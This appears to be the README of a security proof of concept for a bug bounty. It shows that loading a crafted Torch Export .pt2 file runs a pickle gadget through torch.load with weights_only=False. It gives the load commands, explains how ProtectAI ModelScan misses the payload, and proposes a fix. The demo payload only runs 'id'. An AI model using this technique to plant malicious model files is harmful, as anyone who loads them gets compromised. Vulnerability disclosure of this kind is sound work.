Talson/mfv-torch-export-pt2-rce

PoC: Arbitrary code execution loading a malicious .pt2 (Torch Export)

Security research proof-of-concept for the huntr Model File Vulnerability program (target: Torch Export .pt2). The file is non-destructive: on torch.export.load() it runs id and writes the output to /tmp/PT2_RCE_PROOF.txt. It runs no other command.

What this demonstrates

malicious.pt2 is a valid Torch Export archive in which one weight's config entry is marked use_pickle: true and its blob is a torch.save pickle gadget. When loaded, torch.export.load() reconstructs that weight via:

torch.load(io.BytesIO(weight_bytes), weights_only=False)   # _package.py:877 / :935

weights_only=False runs the standard pickle machinery → the gadget's __reduce__ executes. torch.export.load() exposes no weights_only parameter, so there is no safe way to load a .pt2 — it silently bypasses the weights_only=True default PyTorch adopted in 2.6.

import torch
torch.export.load("malicious.pt2")     # -> executes `id`, writes /tmp/PT2_RCE_PROOF.txt

Also: ProtectAI ModelScan reports this file clean (No issues found! 🎉). ModelScan opens the .pt2 zip but refuses to descend into the nested torch.save zip that carries the gadget (ModelScan does not support nested zip files), so the malicious pickle is never inspected.

Reproduce

pip install torch==2.12.0
python3 poc.py                      # builds the file, loads it, prints the executed command output
# or load the bundled file directly:
python3 -c "import torch; torch.export.load('malicious.pt2')"; cat /tmp/PT2_RCE_PROOF.txt
modelscan -p malicious.pt2          # -> "No issues found!"

Files

• malicious.pt2 — the malicious (non-destructive) Torch Export file.
• poc.py — builds the file from scratch and demonstrates the code execution.

Fix

torch.export.load() should default to weights_only=True and expose a weights_only parameter, matching torch.load's post-2.6 posture.

Tested: PyTorch 2.12.0.